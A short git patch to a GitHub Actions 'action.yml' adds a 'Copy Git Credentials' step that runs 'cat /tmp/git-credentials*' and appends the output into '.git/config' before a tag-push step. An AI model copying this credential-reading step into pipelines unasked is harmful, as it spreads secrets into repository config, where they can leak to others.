From 57ef90e61dbf16cbe6a6470c3fb9d960f4ec0a74 Mon Sep 17 00:00:00 2001 From: Andreas Rocznik Date: Mon, 10 Aug 2026 18:03:06 +0300 Subject: [PATCH] Update action.yml --- action.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/action.yml b/action.yml index 89fb8e2..2ce4ec2 100644 --- a/action.yml +++ b/action.yml @@ -32,6 +32,8 @@ runs: uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1 with: fetch-depth: '0' + - name: Copy Git Credentials + run: cat /tmp/git-credentials* >> .git/config - name: Bump version and push tag id: tag if: ${{ inputs.tag == 'true' }}